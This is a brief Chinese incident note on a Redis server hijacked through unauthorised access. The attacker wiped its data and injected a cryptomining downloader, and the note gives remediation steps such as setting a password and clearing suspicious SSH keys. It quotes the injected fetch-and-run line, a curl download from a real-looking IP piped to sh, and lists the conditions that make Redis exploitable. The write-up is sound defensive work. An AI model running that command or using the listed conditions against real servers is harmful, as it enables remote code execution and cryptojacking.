一、问题描述
redis存储的业务数据被清空,且被注入未知的url下载链接:
cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh
百度该链接后,发现是这是一段带有恶意链接脚本,进行恶意shell脚本下载,从而实现远程代码攻击,并进行挖矿行为。
二、分析
分析参考链接:
https://www.freebuf.com/column/211777.html
攻击者利用redis 漏洞,通常设置包含命令以下载外部远程资源并运行它的值。比较流行的命令是添加SSH密钥,因此攻击者还可以远程访问机器并接管它,替换系统命令文件等,利用进行挖矿。
利用redis未授权漏洞入侵的一些必要的条件:
(1)需要开放的redis服务对外开放.Redis的密码不能过于复杂,或者没有密码;
(2) redis服务最好是以root用户运行,破坏力更强;
redis未授权访问漏洞的危害
(1).redis里保存的数据泄露
(2). 被提权后控制整个主机
三、解决
1、清空 crontab 未知的计划任务。(本案未安装crontab)
2、设置 redis 端口权限和账号密码
本案未设置密码,因此进行密码设置,在配置文件设置requirepass *****(密码)
3、清空未知的 ssh key
cd /root/.ssh
打开 authorized_keys ,检查是否有可疑项
打开known_hosts 文件,检查是否有可疑项
/root/.ssh目录下是否有可疑的文件
本案中,authorized_keys 存在可疑项,进行清空,/root/.ssh目录下 存在可疑文件root,进行删除
结果待观察。。。